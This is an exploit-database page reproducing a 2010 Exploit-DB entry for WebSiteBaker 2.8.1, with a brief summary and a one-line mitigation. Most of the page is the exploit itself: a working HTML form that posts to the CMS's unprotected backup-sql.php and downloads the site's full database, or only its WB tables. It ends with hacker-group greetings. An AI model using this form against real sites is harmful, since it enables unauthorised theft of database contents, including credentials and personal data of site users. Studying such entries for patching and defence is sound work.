header-logo
Suggest Exploit
vendor:
WebSiteBaker
by:
Tr0y-x
7,5
CVSS
HIGH
DataBase Backup Exploit
N/A
CWE
Product Name: WebSiteBaker
Affected Version From: 2.8.1
Affected Version To: May Be Later
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows & Linux
2010

WebSiteBaker 2.8.1 DataBase Backup Exploit

WebSiteBaker 2.8.1 is vulnerable to a DataBase Backup Exploit. An attacker can exploit this vulnerability by sending a malicious request to the backup-sql.php file, which allows the attacker to backup all tables in the database or only WB-specific tables.

Mitigation:

Ensure that the backup-sql.php file is not accessible to unauthorized users.
Source

Exploit-DB raw data:

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Exploit Title : WebSiteBaker 2.8.1 DataBase Backup Exploit

Date : 25 - 3 - 2010

Author : Tr0y-x

Version : 2.8.1 & May Be Later

Tested On : Windows & Linux

My Home : WwW[DoT]SeC-WaR[DoT]CoM

Contact Me : Eg[At]Hack[DoT]Cl

::::::::::::::::::::::::::::::::::::::Exploit:::::::::::::::::::::::::::::::::::::::

<title>WebSiteBaker 2.8.1 DataBase Backup</title>

  <p align="center"> </p>
        <p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
        DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
        <p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
        <p align="center"><font size="5" color="#008000"><b>
        <a href="http://WwW.SeC-WaR.CoM<http://www.sec-war.com/>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
        <p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>

        <p align="center"> </p>

<body bgcolor="#000000">

<form name="prompt" method="post" action="http://[Site]/[Path]/modules/backup/backup-sql.php">
        <p align="center"><font color="#FF0000">
  <input type="radio" checked="checked" name="tables" value="ALL"><b>Backup
        all tables in database</b><br>
  <input type="radio" name="tables" value="WB"><b>Backup only WB-specific
        tables</b><br><br>
 <input type="submit" name="backup" value="Backup Database" />
        </font></p>
</form>
<p align="center"> </p>
<p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
<p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Greetz : Alnjm33 - Predator - xXx - Shooter  - Jamba - Jago-dz & All Sec-War.Com Members

                              Specially To My Best Friend XR57

Navigation

Suggest Exploit

Services By CQR